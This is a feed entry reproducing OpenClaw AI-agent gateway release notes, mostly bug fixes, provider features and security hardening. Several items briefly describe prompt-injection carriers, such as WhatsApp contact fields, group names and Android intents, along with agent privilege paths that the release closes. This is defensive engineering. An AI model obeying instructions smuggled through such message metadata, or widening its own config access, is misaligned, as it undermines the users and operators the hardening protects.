<li>Providers/OpenAI: honor the private-network SSRF opt-in for OpenAI-compatible image generation endpoints, so trusted LocalAI/LAN <code>image_generate</code> routes work without disabling SSRF checks globally. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221864091" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62879/hovercard" href="https://github.com/openclaw/openclaw/issues/62879">#62879</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/seitzbg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/seitzbg">@seitzbg</a>.</li>
<li>Providers/OpenAI: stop advertising the removed <code>gpt-5.3-codex-spark</code> Codex model through fallback catalogs, and suppress stale rows with a GPT-5.5 recovery hint.</li>
<li>Control UI/chat: persist assistant-generated images as authenticated managed media and accept paired-device tokens for assistant media fetches, so webchat history reloads keep showing generated images. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317927968" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70719" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70719/hovercard" href="https://github.com/openclaw/openclaw/pull/70719">#70719</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318227484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70741" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70741/hovercard" href="https://github.com/openclaw/openclaw/pull/70741">#70741</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>.</li>
<li>Control UI/chat: queue Stop-button aborts across Gateway reconnects so a disconnected active run is canceled on reconnect instead of only clearing local UI state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317304097" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70673" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70673/hovercard" href="https://github.com/openclaw/openclaw/pull/70673">#70673</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chinar-amrutkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chinar-amrutkar">@chinar-amrutkar</a>.</li>
<li>Memory/QMD: recreate stale managed QMD collections when startup repair finds the collection name already exists, so root memory narrows back to <code>MEMORY.md</code> instead of staying on broad workspace markdown indexing.</li>
<li>Agents/OpenAI: surface selected-model capacity failures from PI, Codex, and auto-reply harness paths with a model-switch hint instead of the generic empty-response error. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/QR: replace legacy <code>qrcode-terminal</code> QR rendering with bounded <code>qrcode-tui</code> helpers for plugin login/setup flows. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4255382870" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65969" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65969/hovercard" href="https://github.com/openclaw/openclaw/pull/65969">#65969</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Voice-call/realtime: wait for OpenAI session configuration before greeting or forwarding buffered audio, and reject non-allowlisted Twilio callers before stream setup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4061033395" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43501" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/43501/hovercard" href="https://github.com/openclaw/openclaw/pull/43501">#43501</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/forrestblount/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/forrestblount">@forrestblount</a>.</li>
<li>ACPX/Codex: stop materializing <code>auth.json</code> bridge files for Codex ACP, Codex app-server, and Codex CLI runs; Codex-owned runtimes now use their normal <code>CODEX_HOME</code>/<code>~/.codex</code> auth path directly.</li>
<li>Auto-reply/system events: route async exec-event completion replies through the persisted session delivery context, so long-running command results return to the originating channel instead of being dropped when live origin metadata is missing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310392062" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70258" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70258/hovercard" href="https://github.com/openclaw/openclaw/pull/70258">#70258</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wzfukui/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wzfukui">@wzfukui</a>.</li>
<li>Gateway/sessions: extend the webchat session-mutation guard to <code>sessions.compact</code> and <code>sessions.compaction.restore</code>, so <code>WEBCHAT_UI</code> clients are rejected from compaction-side session mutations consistently with the existing patch/delete guards. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317846623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70716" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70716/hovercard" href="https://github.com/openclaw/openclaw/pull/70716">#70716</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>QA channel/security: reject non-HTTP(S) inbound attachment URLs before media fetch, and log rejected schemes so suspicious or misconfigured payloads are visible during debugging. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317761421" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70708" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70708/hovercard" href="https://github.com/openclaw/openclaw/pull/70708">#70708</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/install: link the host OpenClaw package into external plugins that declare <code>openclaw</code> as a peer dependency, so peer-only plugin SDK imports resolve after install without bundling a duplicate host package. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313294513" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70462" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70462/hovercard" href="https://github.com/openclaw/openclaw/pull/70462">#70462</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anishesg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anishesg">@anishesg</a>.</li>
<li>Plugins/Windows: refresh the packaged plugin SDK alias in place during bundled runtime dependency repair, so gateway and CLI plugin startup no longer race on <code>ENOTEMPTY</code>/<code>EPERM</code> after same-guest npm updates.</li>
<li>Teams/security: require shared Bot Framework audience tokens to name the configured Teams app via verified <code>appid</code> or <code>azp</code>, blocking cross-bot token replay on the global audience. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317946331" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70724" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70724/hovercard" href="https://github.com/openclaw/openclaw/pull/70724">#70724</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/startup: resolve bundled plugin Jiti loads relative to the target plugin module instead of the central loader, so Bun global installs no longer hang while discovering bundled image providers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307757270" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70073" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70073/hovercard" href="https://github.com/openclaw/openclaw/pull/70073">#70073</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yidianyiko/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yidianyiko">@yidianyiko</a>.</li>
<li>Anthropic/CLI security: derive Claude CLI <code>bypassPermissions</code> from OpenClaw's existing YOLO exec policy, preserve explicit raw Claude <code>--permission-mode</code> overrides, and strip malformed permission-mode args instead of silently falling back to a bypass. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317943033" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70723" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70723/hovercard" href="https://github.com/openclaw/openclaw/pull/70723">#70723</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Android/security: require loopback-only cleartext gateway connections on Android manual and scanned routes, so private-LAN and link-local <code>ws://</code> endpoints now fail closed unless TLS is enabled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317940763" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70722" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70722/hovercard" href="https://github.com/openclaw/openclaw/pull/70722">#70722</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Pairing/security: require private-IP or loopback hosts for cleartext mobile pairing, and stop treating <code>.local</code> or dotless hostnames as safe cleartext endpoints. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317933544" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70721" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70721/hovercard" href="https://github.com/openclaw/openclaw/pull/70721">#70721</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/security: stop setup-api lookup from falling back to the launch directory, so workspace-local <code>extensions/&lt;plugin&gt;/setup-api.*</code> files cannot be executed during provider setup resolution. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317905776" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70718" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70718/hovercard" href="https://github.com/openclaw/openclaw/pull/70718">#70718</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Approvals/security: require explicit chat exec-approval enablement instead of auto-enabling approval clients just because approvers resolve from config or owner allowlists. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317765259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70715" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70715/hovercard" href="https://github.com/openclaw/openclaw/pull/70715">#70715</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Discord/security: keep native slash-command channel policy from bypassing configured owner or member restrictions, while preserving channel-policy fallback when no stricter access rule exists. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317763069" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70711" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70711/hovercard" href="https://github.com/openclaw/openclaw/pull/70711">#70711</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Android/security: stop <code>ASK_OPENCLAW</code> intents from auto-sending injected prompts, so external app actions only prefill the draft instead of dispatching it immediately. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317764736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70714" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70714/hovercard" href="https://github.com/openclaw/openclaw/pull/70714">#70714</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Secrets/Windows: strip UTF-8 BOMs from file-backed secrets and keep unavailable ACL checks fail-closed unless trusted file or exec providers explicitly opt into <code>allowInsecurePath</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317129545" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70662" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70662/hovercard" href="https://github.com/openclaw/openclaw/pull/70662">#70662</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhanggpcsu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhanggpcsu">@zhanggpcsu</a>.</li>
<li>Agents/image generation: escape ignored override values in tool warnings so parsed <code>MEDIA:</code> directives cannot be injected through unsupported model options. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317762579" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70710" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70710/hovercard" href="https://github.com/openclaw/openclaw/pull/70710">#70710</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QQBot/security: require framework auth for <code>/bot-approve</code> so unauthorized QQ senders cannot change exec approval settings through the unauthenticated pre-dispatch slash-command path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317735442" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70706" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70706/hovercard" href="https://github.com/openclaw/openclaw/pull/70706">#70706</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>MCP/tools: stop the ACPX OpenClaw tools bridge from listing or invoking owner-only tools such as <code>cron</code>, closing a privilege-escalation path for non-owner MCP callers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317612919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70698" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70698/hovercard" href="https://github.com/openclaw/openclaw/pull/70698">#70698</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Feishu/onboarding: load Feishu setup surfaces through a setup-only barrel so first-run setup no longer imports Feishu's Lark SDK before bundled runtime deps are staged. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311786128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70339" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70339/hovercard" href="https://github.com/openclaw/openclaw/pull/70339">#70339</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andrejtr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andrejtr">@andrejtr</a>.</li>
<li>Approvals/startup: let native approval handlers report ready after gateway authentication while replaying pending approvals in the background, so slow or failing replay delivery no longer blocks handler startup or amplifies reconnect storms.</li>
<li>WhatsApp/security: keep contact/vCard/location structured-object free text out of the inline message body and render it through fenced untrusted metadata JSON, limiting hidden prompt-injection payloads in names, phone fields, and location labels/comments.</li>
<li>Group-chat/security: keep channel-sourced group names and participant labels out of inline group system prompts and render them through fenced untrusted metadata JSON.</li>
<li>Agents/replay: preserve Kimi-style <code>functions.&lt;name&gt;:&lt;index&gt;</code> tool-call IDs during strict replay sanitization so custom OpenAI-compatible Kimi routes keep multi-turn tool use intact. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317536165" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70693" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70693/hovercard" href="https://github.com/openclaw/openclaw/pull/70693">#70693</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/geri4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/geri4">@geri4</a>.</li>
<li>Discord/replies: preserve final reply permission context through outbound delivery so Discord replies keep the same channel/member routing rules at send time.</li>
<li>Plugins/startup: restore bundled plugin <code>openclaw/plugin-sdk/*</code> resolution from packaged installs and external runtime-deps stage roots, so Telegram/Discord no longer crash-loop with <code>Cannot find package 'openclaw'</code> after missing dependency repair. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319745436" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70852" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70852/hovercard" href="https://github.com/openclaw/openclaw/pull/70852">#70852</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simonemacario/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simonemacario">@simonemacario</a>.</li>
<li>CLI/Claude: run the same prompt-build hooks and trigger/channel context on <code>claude-cli</code> turns as on direct embedded runs, keeping Claude Code sessions aligned with OpenClaw workspace identity, routing, and hook-driven prompt mutations. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316475365" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70625" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70625/hovercard" href="https://github.com/openclaw/openclaw/pull/70625">#70625</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Discord/plugin startup: keep subagent hooks lazy behind Discord's channel entry so packaged entry imports stay narrow and report import failures with the channel id and entry path.</li>
<li>Memory/doctor: keep root durable memory canonicalized on <code>MEMORY.md</code>, stop treating lowercase <code>memory.md</code> as a runtime fallback, and let <code>openclaw doctor --fix</code> merge true split-brain root files into <code>MEMORY.md</code> with a backup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316390163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70621" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70621/hovercard" href="https://github.com/openclaw/openclaw/pull/70621">#70621</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Providers/Anthropic Vertex: restore ADC-backed model discovery after the lightweight provider-discovery path by resolving emitted discovery entries, exposing synthetic auth on bootstrap discovery, and honoring copied env snapshots when probing the default GCP ADC path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251357682" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65715" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65715/hovercard" href="https://github.com/openclaw/openclaw/issues/65715">#65715</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251358554" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65716" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65716/hovercard" href="https://github.com/openclaw/openclaw/pull/65716">#65716</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/feiskyer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/feiskyer">@feiskyer</a>.</li>
<li>Codex harness/status: pin embedded harness selection per session, show active non-PI harness ids such as <code>codex</code> in <code>/status</code>, and keep legacy transcripts on PI until <code>/new</code> or <code>/reset</code> so config changes cannot hot-switch existing sessions.</li>
<li>Gateway/security: fail closed on agent-driven <code>gateway config.apply</code>/<code>config.patch</code> runtime edits by allowlisting a narrow set of agent-tunable prompt, model, and mention-gating paths (including Telegram topic-level <code>requireMention</code>) instead of relying on a hand-maintained denylist of protected subtrees that could miss new sensitive config keys. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317956002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70726" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70726/hovercard" href="https://github.com/openclaw/openclaw/pull/70726">#70726</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Webhooks/security: re-resolve <code>SecretRef</code>-backed webhook route secrets on each request so <code>openclaw secrets reload</code> revokes the previous secret immediately instead of waiting for a gateway restart. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317967302" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70727" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70727/hovercard" href="https://github.com/openclaw/openclaw/pull/70727">#70727</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Memory/dreaming: decouple the managed dreaming cron from heartbeat by running it as an isolated lightweight agent turn, so dreaming runs even when heartbeat is disabled for the default agent and is no longer skipped by <code>heartbeat.activeHours</code>. <code>openclaw doctor --fix</code> migrates stale main-session dreaming jobs in persisted cron configs to the new shape. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4304626834" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69811" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69811/hovercard" href="https://github.com/openclaw/openclaw/issues/69811">#69811</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4271783037" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67397" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67397/hovercard" href="https://github.com/openclaw/openclaw/issues/67397">#67397</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291011689" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68972" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68972/hovercard" href="https://github.com/openclaw/openclaw/issues/68972">#68972</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318151876" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70737" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70737/hovercard" href="https://github.com/openclaw/openclaw/pull/70737">#70737</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>Agents/CLI: keep <code>--agent</code> plus <code>--session-id</code> lookup scoped to the requested agent store, so explicit agent resumes cannot select another agent's session. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321202277" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70985" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70985/hovercard" href="https://github.com/openclaw/openclaw/pull/70985">#70985</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frankekn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frankekn">@frankekn</a>.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.4.23-beta.6]]></title>
<description><![CDATA[2026.4.23
Changes

Providers/OpenAI: add image generation and reference-image editing through Codex OAuth, so openai/gpt-image-2 works without an OPENAI_API_KEY. Fixes #70703.
Providers/OpenRouter: add image generation and reference-image editing through image_generate, so OpenRouter image models...]]></description>
<link>https://tsecurity.de/de/3461833/downloads/openclaw-2026423-beta6/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3461833/downloads/openclaw-2026423-beta6/</guid>
<pubDate>Fri, 24 Apr 2026 16:46:00 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.23</h2>
<h3>Changes</h3>
<ul>
<li>Providers/OpenAI: add image generation and reference-image editing through Codex OAuth, so <code>openai/gpt-image-2</code> works without an <code>OPENAI_API_KEY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317685103" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70703" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70703/hovercard" href="https://github.com/openclaw/openclaw/issues/70703">#70703</a>.</li>
<li>Providers/OpenRouter: add image generation and reference-image editing through <code>image_generate</code>, so OpenRouter image models work with <code>OPENROUTER_API_KEY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4142164318" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55066" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55066/hovercard" href="https://github.com/openclaw/openclaw/issues/55066">#55066</a> via <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4275765906" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67668" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67668/hovercard" href="https://github.com/openclaw/openclaw/pull/67668">#67668</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/notamicrodose/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/notamicrodose">@notamicrodose</a>.</li>
<li>Image generation: let agents request provider-supported quality and output format hints, and pass OpenAI-specific background, moderation, compression, and user hints through the <code>image_generate</code> tool. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313875031" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70503" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70503/hovercard" href="https://github.com/openclaw/openclaw/pull/70503">#70503</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ottodeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ottodeng">@ottodeng</a>.</li>
<li>Agents/subagents: add optional forked context for native <code>sessions_spawn</code> runs so agents can let a child inherit the requester transcript when needed, while keeping clean isolated sessions as the default; includes prompt guidance, context-engine hook metadata, docs, and QA coverage.</li>
<li>Agents/tools: add optional per-call <code>timeoutMs</code> support for image, video, music, and TTS generation tools so agents can extend provider request timeouts only when a specific generation needs it.</li>
<li>Memory/local embeddings: add configurable <code>memorySearch.local.contextSize</code> with a 4096 default so local embedding contexts can be tuned for constrained hosts without patching the memory host. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4314612454" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70544" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70544/hovercard" href="https://github.com/openclaw/openclaw/pull/70544">#70544</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aalekh-sarvam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aalekh-sarvam">@aalekh-sarvam</a>.</li>
<li>Dependencies/Pi: update bundled Pi packages to <code>0.70.0</code>, use Pi's upstream <code>gpt-5.5</code> catalog metadata for OpenAI and OpenAI Codex, and keep only local <code>gpt-5.5-pro</code> forward-compat handling.</li>
